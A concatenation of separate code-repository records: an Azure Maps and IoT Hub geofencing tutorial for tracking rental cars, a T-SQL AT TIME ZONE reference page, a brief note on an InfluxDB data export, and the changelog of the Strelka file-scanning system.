"MIT"
] | null | null | null | # Juneauempire2020.gov-
Admiral Ronald Lyle Juneau
| 17.333333 | 27 | 0.807692 | nno_Latn | 0.245064 |
9a5db50b26314d945dc37c71cbd3af67e96e2629 | 22,984 | md | Markdown | articles/azure-maps/tutorial-iot-hub-maps.md | jmartens/azure-docs.nl-nl-1 | a38978ea36c628c203be597133a734cf250f0065 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/azure-maps/tutorial-iot-hub-maps.md | jmartens/azure-docs.nl-nl-1 | a38978ea36c628c203be597133a734cf250f0065 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/azure-maps/tutorial-iot-hub-maps.md | jmartens/azure-docs.nl-nl-1 | a38978ea36c628c203be597133a734cf250f0065 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 'Zelfstudie: Ruimtelijke IoT-analyse implementeren | Microsoft Azure Maps'
description: Zelfstudie over het integreren van IoT Hub met API's van de Microsoft Azure Maps-service
author: anastasia-ms
ms.author: v-stharr
ms.date: 09/01/2020
ms.topic: tutorial
ms.service: azure-maps
services: azure-maps
manager: philmea
ms.custom: mvc
ms.openlocfilehash: 6109164d8827a343a550a114acc42db2461f3a2c
ms.sourcegitcommit: 80c1056113a9d65b6db69c06ca79fa531b9e3a00
ms.translationtype: HT
ms.contentlocale: nl-NL
ms.lasthandoff: 12/09/2020
ms.locfileid: "96905346"
---
# <a name="tutorial-implement-iot-spatial-analytics-by-using-azure-maps"></a>Tutorial: Implement IoT spatial analytics by using Azure Maps
In an IoT scenario, it's common to capture and track relevant events that occur in space and time. Examples include fleet management, asset tracking, mobility, and smart city applications. This tutorial guides you through a solution that tracks used rental car movement by using the Azure Maps APIs.
In this tutorial, you will:
> [!div class="checklist"]
> * Create an Azure storage account to log car tracking data.
> * Upload a geofence to the Azure Maps Data service (Preview) by using the Data Upload API.
> * Create a hub in Azure IoT Hub, and register a device.
> * Create a function in Azure Functions, implementing business logic based on Azure Maps spatial analytics.
> * Subscribe to IoT device telemetry events from the Azure function via Azure Event Grid.
> * Filter the telemetry events by using IoT Hub message routing.
## <a name="prerequisites"></a>Prerequisites
1. Sign in to the [Azure portal](https://portal.azure.com).
2. [Create an Azure Maps account](quick-demo-map-app.md#create-an-azure-maps-account).
3. [Get the primary subscription key for your account](quick-demo-map-app.md#get-the-primary-key-for-your-account), also known as the primary key or the subscription key. For more information, see [Manage authentication in Azure Maps](how-to-manage-authentication.md).
4. [Create a resource group.](../azure-resource-manager/management/manage-resource-groups-portal.md#create-resource-groups) In this tutorial, we'll name the resource group *ContosoRental*, but you can choose any name you like.
5. Download the [rentalCarSimulation C# project](https://github.com/Azure-Samples/iothub-to-azure-maps-geofencing/tree/master/src/rentalCarSimulation).
This tutorial uses the [Postman](https://www.postman.com/) application, but you can choose a different API development environment.
## <a name="use-case-rental-car-tracking"></a>Use case: rental car tracking
Let's say that a car rental company wants to log location information, distance traveled, and running state for its rental cars. The company also wants to store this information whenever a car leaves the correct authorized geographic region.
The rental cars are equipped with IoT devices that regularly send telemetry data to IoT Hub. The telemetry includes the current location and indicates whether the car's engine is running. The device location schema adheres to the [IoT Plug and Play schema for geospatial data](https://github.com/Azure/opendigitaltwins-dtdl/blob/master/DTDL/v1-preview/schemas/geospatial.md). The rental car's device telemetry schema looks like the following JSON code:
```JSON
{
"data": {
"properties": {
"Engine": "ON"
},
"systemProperties": {
"iothub-content-type": "application/json",
"iothub-content-encoding": "utf-8",
"iothub-connection-device-id": "ContosoRentalDevice",
"iothub-connection-auth-method": "{\"scope\":\"device\",\"type\":\"sas\",\"issuer\":\"iothub\",\"acceptingIpFilterRule\":null}",
"iothub-connection-auth-generation-id": "636959817064335548",
"iothub-enqueuedtime": "2019-06-18T00:17:20.608Z",
"iothub-message-source": "Telemetry"
},
"body": {
"location": {
"type": "Point",
"coordinates": [ -77.025988698005662, 38.9015330523316 ]
}
}
}
}
```
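As a quick illustration of consuming this payload (a Python sketch, not part of the tutorial's C# project; the field names simply mirror the sample above), a handler only needs the GeoJSON coordinates and the `Engine` property:

```python
import json

# Minimal sample event following the telemetry schema shown above.
sample_event = """
{
  "data": {
    "properties": { "Engine": "ON" },
    "body": {
      "location": {
        "type": "Point",
        "coordinates": [ -77.025988698005662, 38.9015330523316 ]
      }
    }
  }
}
"""

def parse_telemetry(raw: str):
    """Return (longitude, latitude, engine_on) from a telemetry event."""
    event = json.loads(raw)
    data = event["data"]
    # GeoJSON stores coordinates in longitude, latitude order.
    lon, lat = data["body"]["location"]["coordinates"]
    engine_on = data["properties"].get("Engine") == "ON"
    return lon, lat, engine_on

print(parse_telemetry(sample_event))
```

Note the longitude-first coordinate order, which is easy to get backwards when passing values to mapping APIs.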
In this tutorial, you track only one vehicle. After you set up the Azure services, you need to download the [rentalCarSimulation C# project](https://github.com/Azure-Samples/iothub-to-azure-maps-geofencing/tree/master/src/rentalCarSimulation) to run the vehicle simulator. The entire process, from event to function execution, is summarized in the following steps:
1. The in-vehicle device sends telemetry data to IoT Hub.
2. If the car engine is running, the hub publishes the telemetry data to Event Grid.
3. An Azure function is triggered because of its event subscription to device telemetry events.
4. The function logs the vehicle device location coordinates, event time, and device ID. It then uses the [Spatial Geofence Get API](/rest/api/maps/spatial/getgeofence) to determine whether the car has driven outside the geofence. If it has traveled outside the geofence boundaries, the function stores the location data received from the event in a blob container. The function also queries [Reverse Address Search](/rest/api/maps/search/getsearchaddressreverse) to translate the coordinate location to a street address, and stores it with the rest of the device location data.
:::image type="content" source="./media/tutorial-iot-hub-maps/system-diagram.png" border="false" alt-text="Diagram van systeemoverzicht.":::
In de volgende afbeelding is het geofence-gebied blauw gemarkeerd. De route van de huurauto wordt aangegeven met een groene lijn.
:::image type="content" source="./media/tutorial-iot-hub-maps/geofence-route.png" border="false" alt-text="Afbeelding van geofence-route.":::
## <a name="create-an-azure-storage-account"></a>Create an Azure storage account
To store car violation tracking data, create a [general-purpose v2 storage account](../storage/common/storage-account-overview.md#general-purpose-v2-accounts) in your resource group. If you haven't created a resource group yet, follow the instructions in [Create resource groups](../azure-resource-manager/management/manage-resource-groups-portal.md#create-resource-groups). In this tutorial, you'll name your resource group *ContosoRental*.
To create a storage account, follow the instructions in [Create a storage account](../storage/common/storage-account-create.md?tabs=azure-portal). In this tutorial, you'll name the storage account *contosorentalstorage*, but in general you can name it anything you like.
When you've successfully created your storage account, you then need to create a container to store logging data.
1. Go to your newly created storage account. In the **Essentials** section, select the **Containers** link.
:::image type="content" source="./media/tutorial-iot-hub-maps/containers.png" alt-text="Screenshot of containers for blob storage.":::
2. In the upper-left corner, select **+ Container**. A panel appears on the right side of the browser. Name your container *contoso-rental-logs* and select **Create**.
:::image type="content" source="./media/tutorial-iot-hub-maps/container-new.png" alt-text="Screenshot of creating a blob container.":::
3. Go to the **Access keys** pane in your storage account, and copy the **Storage account name** and the **Key** value in the **key1** section. You'll need both of these values in the "Create an Azure function and add an Event Grid subscription" section.
:::image type="content" source="./media/tutorial-iot-hub-maps/access-keys.png" alt-text="Screenshot of copying the storage account name and key.":::
## <a name="upload-a-geofence"></a>Upload a geofence
Now use the [Postman app](https://www.getpostman.com) to [upload the geofence](./geofence-geojson.md) to Azure Maps. The geofence defines the authorized geographical area for the rental vehicle. You'll use the geofence in your Azure function to determine whether a car has moved outside the geofence area.
Follow these steps to upload the geofence by using the Azure Maps Data Upload API:
1. Open the Postman app and select **New**. In the **Create New** window, select **Collection**. Name the collection and select **Create**.
2. To create the request, select **New** again. In the **Create New** window, select **Request**, and enter a request name for the request. Select the collection you created in the previous step, and then select **Save**.
3. Select the **POST** HTTP method in the builder tab, and enter the following URL to upload the geofence to the Data Upload API. Make sure to replace `{subscription-key}` with your primary subscription key.
```HTTP
https://atlas.microsoft.com/mapData/upload?subscription-key={subscription-key}&api-version=1.0&dataFormat=geojson
```
The `geojson` value against the `dataFormat` parameter in the URL path represents the format of the data being uploaded.
4. Select **Body** > **raw** for the input format, and choose **JSON** from the drop-down list. [Open the JSON data file](https://raw.githubusercontent.com/Azure-Samples/iothub-to-azure-maps-geofencing/master/src/Data/geofence.json?token=AKD25BYJYKDJBJ55PT62N4C5LRNN4), and copy the file into the body section. Select **Send**.
5. Select **Send** and wait for the request to process. When the request completes, go to the **Headers** tab of the response. Copy the value of the **Location** key, which is the `status URL`.
```http
https://atlas.microsoft.com/mapData/operations/<operationId>?api-version=1.0
```
6. To check the status of the API call, create a **GET** HTTP request on the `status URL`. You'll need to append your primary subscription key to the URL for authentication. The **GET** request should look like the following URL:
```HTTP
https://atlas.microsoft.com/mapData/<operationId>/status?api-version=1.0&subscription-key={subscription-key}
```
7. When the **GET** HTTP request completes successfully, it returns a `resourceLocation`. The `resourceLocation` contains the unique `udid` for the uploaded content. Copy this `udid` for later use in this tutorial.
```json
{
    "status": "Succeeded",
    "resourceLocation": "https://atlas.microsoft.com/mapData/metadata/{udid}?api-version=1.0"
}
```
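The `udid` is the only piece of the status response you need later. As a small illustrative helper (Python; the sample `udid` value below is made up), you could extract it like this:

```python
from urllib.parse import urlparse

def extract_udid(status_response: dict) -> str:
    """Pull the udid out of a mapData status response's resourceLocation."""
    location = status_response["resourceLocation"]
    path = urlparse(location).path            # e.g. /mapData/metadata/{udid}
    return path.rstrip("/").split("/")[-1]

# Example status payload; the udid here is invented for illustration.
status = {
    "status": "Succeeded",
    "resourceLocation": "https://atlas.microsoft.com/mapData/metadata/25084fb7-307a-4720-8f91-7952a0b91012?api-version=1.0"
}
print(extract_udid(status))  # 25084fb7-307a-4720-8f91-7952a0b91012
```

Parsing the URL rather than string-slicing keeps the helper robust to the `api-version` query string.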
## <a name="create-an-iot-hub"></a>Create an IoT hub
IoT Hub enables secure and reliable bidirectional communication between an IoT application and the devices it manages. For this tutorial, you want to get information from your in-vehicle device to determine the location of the rental car. In this section, you create an IoT hub within the *ContosoRental* resource group. This hub will be responsible for publishing your device telemetry events.
> [!NOTE]
> The capability to publish device telemetry events on Event Grid is currently in public preview. It's available in all regions except the following: East US, West US, West Europe, Azure Government, Azure China 21Vianet, and Azure Germany.
To create an IoT hub in the *ContosoRental* resource group, follow the steps in [Create an IoT hub](https://docs.microsoft.com/azure/iot-hub/quickstart-send-telemetry-dotnet#create-an-iot-hub).
## <a name="register-a-device-in-your-iot-hub"></a>Register a device in your IoT hub
Devices can't connect to the IoT hub unless they're registered in the IoT hub identity registry. Here, you'll create a single device with the name *InVehicleDevice*. To create and register the device within your IoT hub, follow the steps in [Register a new device in the IoT hub](https://docs.microsoft.com/azure/iot-hub/iot-hub-create-through-portal#register-a-new-device-in-the-iot-hub). Make sure to copy the primary connection string of your device. You'll need it later.
## <a name="create-a-function-and-add-an-event-grid-subscription"></a>Create a function and add an Event Grid subscription
Azure Functions is a serverless compute service that allows you to run small pieces of code (functions) without the need to explicitly provision or manage compute infrastructure. To learn more, see [Azure Functions](https://docs.microsoft.com/azure/azure-functions/functions-overview).
A function is triggered by a certain event. Here, you'll create a function that is triggered by an Event Grid trigger. Create the relationship between trigger and function by creating an event subscription for IoT Hub device telemetry events. When a device telemetry event occurs, your function is called as an endpoint, and receives the relevant data for the device you previously registered in IoT Hub.
Here's the [C# script code that your function will contain](https://github.com/Azure-Samples/iothub-to-azure-maps-geofencing/blob/master/src/Azure%20Function/run.csx).
Now, set up your Azure function.
1. In the Azure portal dashboard, select **Create a resource**. Type **Function App** in the text box. Select **Function App** > **Create**.
1. On the **Function App** creation page, name your function app. Under **Resource Group**, select **ContosoRental** from the drop-down list. Select **.NET Core** as the **Runtime Stack**. At the bottom of the page, select **Next: Hosting >**.
:::image type="content" source="./media/tutorial-iot-hub-maps/rental-app.png" alt-text="Screenshot of creating a function app.":::
1. For **Storage account**, select the storage account you created in [Create an Azure storage account](#create-an-azure-storage-account). Select **Review + create**.
1. Review the function app details, and select **Create**.
1. After the app is created, you add a function to it. Go to the function app. Select the **Functions** pane. At the top of the page, select **+ Add**. The function template panel appears. Scroll down the panel, and select **Azure Event Grid Trigger**.
>[!IMPORTANT]
> The **Azure Event Hub Trigger** and the **Azure Event Grid Trigger** templates have similar names. Make sure you select the **Azure Event Grid Trigger** template.
:::image type="content" source="./media/tutorial-iot-hub-maps/function-create.png" alt-text="Screenshot of creating a function.":::
1. Give the function a name. In this tutorial, you'll use the name *GetGeoFunction*, but in general you can use any name you like. Select **Create function**.
1. In the left menu, select the **Code + Test** pane. Copy and paste the [C# script](https://github.com/Azure-Samples/iothub-to-azure-maps-geofencing/blob/master/src/Azure%20Function/run.csx) into the code window.
:::image type="content" source="./media/tutorial-iot-hub-maps/function-code.png" alt-text="Screenshot of copying and pasting code into the function window.":::
1. In the C# code, replace the following parameters:
   * Replace **SUBSCRIPTION_KEY** with your Azure Maps account primary subscription key.
   * Replace **UDID** with the `udid` of the geofence you uploaded in [Upload a geofence](#upload-a-geofence).
   * The `CreateBlobAsync` function in the script creates a blob per event in the data storage account. Replace the **ACCESS_KEY**, **ACCOUNT_NAME**, and **STORAGE_CONTAINER_NAME** with your storage account's access key, account name, and data storage container. These values were generated when you created your storage account in [Create an Azure storage account](#create-an-azure-storage-account).
1. In the left menu, select the **Integration** pane. Select **Event Grid Trigger** in the diagram. Type a name for the trigger, *eventGridEvent*, and select **Create Event Grid subscription**.
:::image type="content" source="./media/tutorial-iot-hub-maps/function-integration.png" alt-text="Screenshot of adding an event subscription.":::
1. Fill out the subscription details. Name the event subscription. For **Event Schema**, select **Event Grid Schema**. For **Topic Types**, select **Azure IoT Hub Accounts**. For **Resource Group**, select the resource group you created at the beginning of this tutorial. For **Resource**, select the IoT hub you created in "Create an IoT hub." For **Filter to Event Types**, select **Device Telemetry**.
After choosing these options, you'll see the **Topic Type** change to **IoT Hub**. For **System Topic Name**, you can use the same name as your resource. Finally, in the **Endpoint details** section, select **Select an endpoint**. Accept all settings and select **Confirm Selection**.
:::image type="content" source="./media/tutorial-iot-hub-maps/function-create-event-subscription.png" alt-text="Screenshot of creating an event subscription.":::
1. Review your settings. Make sure that the endpoint specifies the function you created at the beginning of this section. Select **Create**.
:::image type="content" source="./media/tutorial-iot-hub-maps/function-create-event-subscription-confirm.png" alt-text="Screenshot of confirming the event subscription creation.":::
1. Now you're back at the **Edit Trigger** panel. Select **Save**.
## <a name="filter-events-by-using-iot-hub-message-routing"></a>Filter events by using IoT Hub message routing
When you add an Event Grid subscription to the Azure function, a message route is automatically created in the specified IoT hub. With message routing, you can route different data types to multiple endpoints. For example, you can route device telemetry messages, device life-cycle events, and device twin change events. For more information, see [Use IoT Hub message routing](https://docs.microsoft.com/azure/iot-hub/iot-hub-devguide-messages-d2c).
:::image type="content" source="./media/tutorial-iot-hub-maps/hub-route.png" alt-text="Screenshot of message routing in IoT Hub.":::
In the sample scenario, you only want to receive messages when the rental car is moving. Create a routing query to filter the events where the `Engine` property equals **ON**. To create a routing query, select the **RouteToEventGrid** route and replace the **Routing query** with **"Engine = 'ON'"**. Then select **Save**. The IoT hub now publishes device telemetry only when the engine is on.
:::image type="content" source="./media/tutorial-iot-hub-maps/hub-filter.png" alt-text="Screenshot of filtering routing messages.":::
>[!TIP]
>There are several ways to query IoT device-to-cloud messages. To learn more about message routing syntax, see [Use IoT Hub message routing](https://docs.microsoft.com/azure/iot-hub/iot-hub-devguide-routing-query-syntax).
## <a name="send-telemetry-data-to-iot-hub"></a>Send telemetry data to IoT Hub
When your Azure function is up and running, you can send telemetry data to the IoT hub, which routes it to Event Grid. Use a C# application to simulate location data for an in-vehicle device of a rental car. To run the application, you need the .NET Core SDK 2.1.0 or later on your development computer. Follow these steps to send simulated telemetry data to the IoT hub:
1. If you haven't already done so, download the [rentalCarSimulation](https://github.com/Azure-Samples/iothub-to-azure-maps-geofencing/tree/master/src/rentalCarSimulation) C# project.
2. Open the `simulatedCar.cs` file in a text editor of your choice, and replace the value of `connectionString` with the one you saved when you registered the device. Save your changes to the file.
3. Make sure you have .NET Core installed on your machine. In your local terminal window, go to the root folder of the C# project and run the following command to install the required packages for the simulated device application:
```cmd/sh
dotnet restore
```
4. In the same terminal, run the following command to build and run the rental car simulation application:
```cmd/sh
dotnet run
```
Your local terminal should look similar to the one below.
:::image type="content" source="./media/tutorial-iot-hub-maps/terminal.png" alt-text="Screenshot of terminal output.":::
If you now open the blob storage container, you'll see four blobs for locations where the vehicle was outside the geofence.
:::image type="content" source="./media/tutorial-iot-hub-maps/blob.png" alt-text="Screenshot of viewing blobs in a container.":::
The following map shows four vehicle location points outside the geofence. Each location was logged at regular time intervals.
:::image type="content" source="./media/tutorial-iot-hub-maps/violation-map.png" alt-text="Screenshot of a map showing violations.":::
## <a name="explore-azure-maps-and-iot"></a>Explore Azure Maps and IoT
To explore the Azure Maps APIs used in this tutorial, see:
* [Get Search Address Reverse](/rest/api/maps/search/getsearchaddressreverse)
* [Get Geofence](/rest/api/maps/spatial/getgeofence)
For a complete list of Azure Maps REST APIs, see:
* [Azure Maps REST APIs](/rest/api/maps/spatial/getgeofence)
* [IoT Plug and Play](../iot-pnp/index.yml)
To get a list of devices that are Azure certified for IoT, visit:
* [Azure certified devices](https://catalog.azureiotsolutions.com/)
## <a name="next-steps"></a>Next steps
To learn more about how to send device-to-cloud telemetry, and the other way around, see:
> [!div class="nextstepaction"]
> [Send telemetry from a device](../iot-hub/quickstart-send-telemetry-dotnet.md)
## About
The general test was performed with this application.
The results were exported from InfluxDB with [export_from_InfluxDB.sh](export_from_InfluxDB.sh) and saved to [raw_DB_export.csv](raw_DB_export.csv).
---
description: AT TIME ZONE (Transact-SQL)
title: AT TIME ZONE (Transact-SQL)
ms.date: 06/11/2019
ms.prod: sql
ms.prod_service: database-engine, sql-database
ms.reviewer: ''
ms.custom: ''
ms.technology: t-sql
ms.topic: language-reference
f1_keywords:
- AT TIME ZONE
- AT_TIME_ZONE_TSQL
helpviewer_keywords:
- AT TIME ZONE function
ms.assetid: 311f682f-7f1b-43b6-9ea0-24e36b64f73a
author: VanMSFT
ms.author: vanto
monikerRange: = azuresqldb-current||=azure-sqldw-latest||>= sql-server-2016||>= sql-server-linux-2017
ms.openlocfilehash: 8071dbcced9121cef361c2ceb76589a280ca344f
ms.sourcegitcommit: 1a544cf4dd2720b124c3697d1e62ae7741db757c
ms.translationtype: HT
ms.contentlocale: de-DE
ms.lasthandoff: 12/14/2020
ms.locfileid: "97460883"
---
# <a name="at-time-zone-transact-sql"></a>AT TIME ZONE (Transact-SQL)
[!INCLUDE [sqlserver2016-asdb-asdbmi-asa](../../includes/applies-to-version/sqlserver2016-asdb-asdbmi-asa.md)]
Converts an *inputdate* to the corresponding *datetimeoffset* value in the target time zone. When *inputdate* is provided without offset information, the function applies the offset of the time zone assuming that *inputdate* is in the target time zone. If *inputdate* is provided as a *datetimeoffset* value, the **AT TIME ZONE** clause converts it into the target time zone using the time zone conversion rules.
The implementation of **AT TIME ZONE** relies on a Windows mechanism to convert **datetime** values across time zones.
![Topic link icon](../../database-engine/configure-windows/media/topic-link.gif "Topic link icon") [Transact-SQL Syntax Conventions](../../t-sql/language-elements/transact-sql-syntax-conventions-transact-sql.md)
## <a name="syntax"></a>Syntax
```syntaxsql
inputdate AT TIME ZONE timezone
```
## <a name="arguments"></a>Arguments
*inputdate*
An expression that can be resolved to a **smalldatetime**, **datetime**, **datetime2**, or **datetimeoffset** value.
*timezone*: Name of the destination time zone. [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] relies on time zones stored in the Windows Registry. Time zones installed on the computer are stored in the following registry hive: **KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones**. A list of installed time zones is also exposed through the [sys.time_zone_info (Transact-SQL)](../../relational-databases/system-catalog-views/sys-time-zone-info-transact-sql.md) view.
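As a quick sanity check, you can query this view directly to see which time zone names are valid on your instance; any value in the `name` column can be passed as the *timezone* argument (column names as documented for **sys.time_zone_info**):

```sql
-- List the installed time zones, their current UTC offsets,
-- and whether each zone is currently observing daylight saving time.
SELECT name, current_utc_offset, is_currently_dst
FROM sys.time_zone_info
ORDER BY name;
```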
## <a name="return-types"></a>Return types
Returns the data type of **datetimeoffset**.
## <a name="return-value"></a>Return value
The **datetimeoffset** value in the target time zone.
## <a name="remarks"></a>Remarks
**AT TIME ZONE** applies specific rules when converting input values in **smalldatetime**, **datetime**, and **datetime2** data types that fall into an interval affected by a daylight saving time (DST) change:
- When the clock is set forward, a gap appears in local time equal to the duration of the clock adjustment. This duration is usually 1 hour, but it can be 30 or 45 minutes, depending on the time zone. Points in time that fall within this gap are converted with the offset *after* the DST change.
```sql
/*
Moving to DST in "Central European Standard Time" zone:
offset changes from +01:00 -> +02:00
Change occurred on March 29th, 2015 at 02:00:00.
Adjusted local time became 2015-03-29 03:00:00.
*/
--Time before DST change has standard time offset (+01:00)
SELECT CONVERT(DATETIME2(0), '2015-03-29T01:01:00', 126)
AT TIME ZONE 'Central European Standard Time';
--Result: 2015-03-29 01:01:00 +01:00
/*
Adjusted time from the "gap interval" (between 02:00 and 03:00)
is moved 1 hour ahead and presented with the summer time offset
(after the DST change)
*/
SELECT CONVERT(DATETIME2(0), '2015-03-29T02:01:00', 126)
AT TIME ZONE 'Central European Standard Time';
--Result: 2015-03-29 03:01:00 +02:00
--Time after 03:00 is presented with the summer time offset (+02:00)
SELECT CONVERT(DATETIME2(0), '2015-03-29T03:01:00', 126)
AT TIME ZONE 'Central European Standard Time';
--Result: 2015-03-29 03:01:00 +02:00
```
- When the clock is set back, two hours of local time overlap into one hour. In that case, points in time from the overlapped interval are mapped with the offset *before* the clock change:
```sql
/*
Moving back from DST to standard time in
"Central European Standard Time" zone:
offset changes from +02:00 -> +01:00.
Change occurred on October 25th, 2015 at 03:00:00.
Adjusted local time became 2015-10-25 02:00:00
*/
--Time before the change has DST offset (+02:00)
SELECT CONVERT(DATETIME2(0), '2015-10-25T01:01:00', 126)
AT TIME ZONE 'Central European Standard Time';
--Result: 2015-10-25 01:01:00 +02:00
/*
Time from the "overlapped interval" is presented with standard time
offset (before the change)
*/
SELECT CONVERT(DATETIME2(0), '2015-10-25T02:00:00', 126)
AT TIME ZONE 'Central European Standard Time';
--Result: 2015-10-25 02:00:00 +02:00
--Time after 03:00 is regularly presented with the standard time offset (+01:00)
SELECT CONVERT(DATETIME2(0), '2015-10-25T03:01:00', 126)
AT TIME ZONE 'Central European Standard Time';
--Result: 2015-10-25 03:01:00 +01:00
```
Because information (such as time zone rules) is maintained outside of [!INCLUDE[ssNoVersion_md](../../includes/ssnoversion-md.md)] and is subject to occasional changes, the **AT TIME ZONE** function is classified as nondeterministic.
## <a name="examples"></a>Examples
### <a name="a-add-target-time-zone-offset-to-datetime-without-offset-information"></a>A. Add target time zone offset to datetime without offset information
Use **AT TIME ZONE** to add the offset based on time zone rules when you know that the original **datetime** values are provided in the same time zone:
```sql
USE AdventureWorks2016;
GO
SELECT SalesOrderID, OrderDate,
OrderDate AT TIME ZONE 'Pacific Standard Time' AS OrderDate_TimeZonePST
FROM Sales.SalesOrderHeader;
```
### <a name="b-convert-values-between-different-time-zones"></a>B. Convert values between different time zones
The following example converts values between different time zones:
```sql
USE AdventureWorks2016;
GO
SELECT SalesOrderID, OrderDate,
OrderDate AT TIME ZONE 'Pacific Standard Time' AS OrderDate_TimeZonePST,
OrderDate AT TIME ZONE 'Central European Standard Time' AS OrderDate_TimeZoneCET
FROM Sales.SalesOrderHeader;
```
### <a name="c-query-temporal-tables-using-a-specific-time-zone"></a>C. Query temporal tables using a specific time zone
The following example selects data from a temporal table as of a month ago, with the period columns presented in Pacific Standard Time.
```sql
USE AdventureWorks2016;
GO
DECLARE @ASOF datetimeoffset;
SET @ASOF = DATEADD (month, -1, GETDATE()) AT TIME ZONE 'UTC';
-- Query state of the table a month ago projecting period
-- columns as Pacific Standard Time
SELECT BusinessEntityID, PersonType, NameStyle, Title,
FirstName, MiddleName,
ValidFrom AT TIME ZONE 'Pacific Standard Time'
FROM Person.Person_Temporal
FOR SYSTEM_TIME AS OF @ASOF;
```
## <a name="next-steps"></a>Next steps
- [Date and Time Types](../../t-sql/data-types/date-and-time-types.md)
- [Date and Time Data Types and Functions (Transact-SQL)](../../t-sql/functions/date-and-time-data-types-and-functions-transact-sql.md)
# Changelog
Changes to the project will be tracked in this file via the date of change.
## 2019-12-18
### Added
- Added additional error handling for corrupt documents in ScanDocx
## 2019-12-2
### Changed
- Updated YARA version from 3.10 to 3.11
## 2019-10-26
### Changed
- Removed logging reference in ScanEncryptedDoc
## 2019-10-09
### Changed
- Modified error handling for ScanPlist
### Added
- Added ScanAntiword into backend scanner configuration file (commented out)
## 2019-10-01
### Added
- Added ScanEncryptedDoc which allows users to decrypt documents.
- Added additional error handling for ScanDocx
## 2019-09-30
### Changed
- Modified ScanPE to include additional error handling.
## 2019-09-25
### Added
- Added ScanDoc support for additional metadata extraction.
## 2019-09-19
### Added
- Added support for ScanRar RAR extraction with passwords.
## 2019-09-18
### Added
- Added olecf flavor to ScanIni default
### Changed
- Fixed bug in ScanTnef where an exception was thrown when a key was not present.
## 2019-07-26
### Changed
- Fixed bug in ScanPe when header field is nonexistent (jshlbrd)
## 2019-07-25
### Changed
- Improved speed of ScanZip decryption (jshlbrd)
## 2019-07-24
### Changed
- ScanMmbot fields are now internally consistent with other event dictionaries (jshlbrd)
- Fixed bug in ScanMacho dynamic symbols (jshlbrd)
- Renamed 'decompressed_size' to 'size' across all decompression scanners (jshlbrd)
## 2019-07-12
### Added
- Two new fields in ScanIni (comments and sections) (jshlbrd)
- New scanner ScanZlib can decompress Zlib files (jshlbrd)
### Changed
- Fixed unintended CRC exception when decrypting ZIP files (jshlbrd)
## 2019-07-11
### Added
- New scanner ScanIni can parse INI files (jshlbrd)
## 2019-07-09
### Changed
- Renamed strelka-redis to strelka-manager (jshlbrd)
- Updated ScanPe to better sync with ScanElf and ScanMacho (jshlbrd)
## 2019-06-28
### Changed
- Fixed frontend crashing issues when empty files are sent to cluster (jshlbrd)
## 2019-06-27
### Added
- Added Gatekeeper (temporary event cache), a new required component (jshlbrd)
### Changed
- Transitioned ScanMacho from macholibre to LIEF (jshlbrd)
- Fixed multiple issues in ScanElf JSON dictionary (jshlbrd)
## 2019-06-25
### Changed
- Transitioned ScanElf from pyelftools to LIEF (jshlbrd)
- Fixed ScanPdf f-string flags (jshlbrd)
## 2019-06-24
### Changed
- scan_* dictionaries are now nested under scan: {} (jshlbrd)
- 'time' field is now 'request.time' (jshlbrd)
- 'file.scanners_list' is now 'file.scanners' (jshlbrd)
## 2019-06-21
### Changed
- Updated YAML files to use 2 spaces instead of 4 spaces (jshlbrd)
- Conflicting variable names were refactored (jshlbrd)
- Added .env file for cleaner execution of docker-compose (jshlbrd)
## 2019-06-11
### Changed
- go-redis Z commands changed to non-literal (jshlbrd)
## 2019-05-24
### Added
- 'throughput' section added to fileshot and filestream configuration files (jshlbrd)
- Added default docker-compose DNS hosts to misc/envoy/* configuration templates (jshlbrd)
- Added Docker volume mapping to frontend in default docker-compose (jshlbrd)
### Changed
- Forked pyopenssl replaced with M2Crypto (jshlbrd)
- 'tree' event dictionary is now nested under 'file' event dictionary (jshlbrd)
- Scanner event dictionaries now start with 'scan_' (jshlbrd)
- Timestamps are now unix/epoch (jshlbrd)
- ScanExiftool now outputs 'human readable' data (jshlbrd)
- Looping Redis commands sleep at a consistent interval of 250ms (jshlbrd)
### Removed
- 'cache' is no longer used -- 'coordinator' takes over all Redis tasks (jshlbrd)
## 2019-05-16
### Changed
- Switched pyopenssl to forked package (jshlbrd)
- Archived 0MQ branch (jshlbrd)
- Migrated gRPC to master (jshlbrd)
## 2019-04-22
### Added
- Dockerfile now supports UTC and local time (ufomorme)
## 2019-03-23
### Added
- Scan event start and finish timestamps now support UTC and local time (ufomorme)
## 2019-03-08
### Changed
- Improved YARA tasting signature for email files (DavidJBianco)
- Fixed install path for taste directory (jshlbrd)
## 2019-02-19
### Added
- "beautified" field (bool) to ScanJavascript (jshlbrd)
## 2019-02-14
### Added
- strelka_dirstream.py now supports recursive directory scanning (zachsis)
## 2019-02-07
### Added
- ScanZip now supports decryption via password bruteforcing (ksdahl)
## 2019-02-04
### Added
- Unit tests for ScanPe added (infosec-intern)
## 2019-02-01
### Added
- strelka_dirstream.py now supports moving files after upload (zachsis)
## 2019-01-28
### Added
- Added version info to ScanPe (infosec-intern)
## 2019-01-26
### Changed
- Expanded identification of email files (DavidJBianco)
## 2019-01-16
### Changed
- pip packages now installed via requirements.txt file(s) (infosec-intern)
## 2019-01-03
### Added
- EOF error flag to ScanBzip2 (jshlbrd)
### Changed
- taste_yara now loads files from directories, not a static file (ksdahl)
## 2018-12-12
### Added
- Options for manually setting ZeroMQ TCP reconnections on the task socket (between broker and workers) (jshlbrd)
### Changed
- "request_port" option renamed to "request_socket_port" (jshlbrd)
- "task_port" option renamed to "task_socket_port" (jshlbrd)
## 2018-12-10
### Changed
- strelka_dirstream.py switched from using inotify to directory polling (jshlbrd)
- strelka_dirstream.py supports monitoring multiple directories (jshlbrd)
- extract-strelka.bro will temporarily disable file extraction when the extraction directory reaches a maximum threshold (jshlbrd)
## 2018-11-27
### Added
- New scanner ScanFalconSandbox can send files to CrowdStrike's Falcon Sandbox (ksdahl)
## 2018-10-16
### Added
- New scanner ScanPhp can collect tokenized metadata from PHP files (jshlbrd)
## 2018-10-05
### Added
- New scanner ScanStrings can collect strings from file data (similar to Unix "strings" utility) (jshlbrd)
### Changed
- ScanPdf was unintentionally extracting duplicate streams, but now it is fixed to only extract unique streams (jshlbrd)
## 2018-10-03
### Added
- ScanJavascript now supports deobfuscating JavaScript files before parsing metadata (jshlbrd)
## 2018-09-28
### Added
- ScanUrl now supports user-defined regular expressions that can be called per-file (jshlbrd)
